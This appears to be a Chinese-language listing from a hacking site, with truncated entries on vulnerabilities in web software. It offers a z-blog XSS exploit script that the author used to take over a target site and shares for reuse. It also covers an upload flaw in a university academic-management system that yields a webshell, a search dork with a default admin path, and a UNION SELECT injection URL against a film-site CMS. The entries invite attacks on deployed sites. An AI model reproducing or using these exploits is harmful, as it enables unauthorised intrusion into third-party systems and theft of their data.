-
z-blog XSS 利用脚本
之前检测的一个目标站z-blog,程序有改动,存在 xss ,写了个 脚本 拿下了,要用的拿去,可以当模版用。function saveUserInfo(){var url = "/cmd.asp?act=SiteFilePst&...
-
毕节热线祝福程序v3.0 后台验证漏洞
该程序没有防注入代码,id=request("id")id=left(id,8)很多都这样取值,因为取值只取左边起8个字符,所以,注入没什么利用的。看看后台登录 /admin/login.asp<%if reque...
-
正方高校教务管理系统漏洞
正方高校教务管理系统是一款学生成绩,选课管理系统,目前有众多高校使用这款教务管理系统近期该系统爆出了一个高危漏洞,攻击者可以利用该漏洞轻易获取网站webshell权限下面给出漏洞的方法:漏洞类型:上传漏洞漏洞文件:/ftb.imagegal...
-
小FAN团队淘客程序关键字
关键词:inurl:announce.php?announceid=漏洞页面:show.php?id=3默认后台:admin后台有fckeditor注入漏洞不多说了,喜欢的玩去吧...
-
飞飞影视系统(PHP) v1.9 注入漏洞
使用方法:http://www.xxxx.com /?s=vod-read-id-1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1...
